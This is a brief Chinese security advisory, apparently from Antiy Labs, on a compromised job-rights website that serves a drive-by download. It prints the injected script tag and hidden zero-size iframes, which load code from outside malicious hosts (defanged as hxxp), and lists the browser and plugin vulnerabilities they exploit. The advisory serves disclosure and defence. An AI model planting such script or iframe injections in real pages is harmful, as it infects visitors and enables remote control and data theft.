就業(yè)維權(quán)網(wǎng)(hxxp://www.526job.com/)被黑客植入病毒，用戶如果訪問該網(wǎng)頁，系統(tǒng)就會自動從惡意網(wǎng)站上下載并運行惡意程序。被感染病毒的用戶系統(tǒng)可能被遠程控制，盜取用戶敏感信息。甚至導(dǎo)致死機。

該網(wǎng)站問題代碼：

                                                                                               <script src=hxxp://3b3.org/c.js></script>

hxxp://3b3.org/c.js問題框架代碼：

                                                          <iframe src=hxxp://vwwew33.2288.org/a/a100.htm width=0 height=0></iframe>

hxxp://vwwew33.2288.org/a/a100.htm問題框架代碼：

                                                                         <iframe src="cnzz.htm" width=111 height=0 border=0></iframe>

hxxp://vwwew33.2288.org/a/cnzz.htm問題框架代碼

經(jīng)解密后，發(fā)現(xiàn)該掛馬網(wǎng)頁通過以下幾個漏洞進行傳播：

MS06-014漏洞

Adobe Flash Player SWF文件漏洞

Qvod Player漏洞

RealPlayer播放器IERPCtl.IERPCtl.1漏洞

暴風(fēng)影音2 mps.dll組件多個緩沖區(qū)溢出漏洞

MS09-002漏洞

聯(lián)眾世界GLWorld HanGamePluginCn18類ActiveX控件棧溢出漏洞

MS08-041漏洞

【注：基于安全考慮，所有網(wǎng)絡(luò)鏈接“http”均已被替換為“hxxp”，特此說明。】

【資料來源：安天實驗室】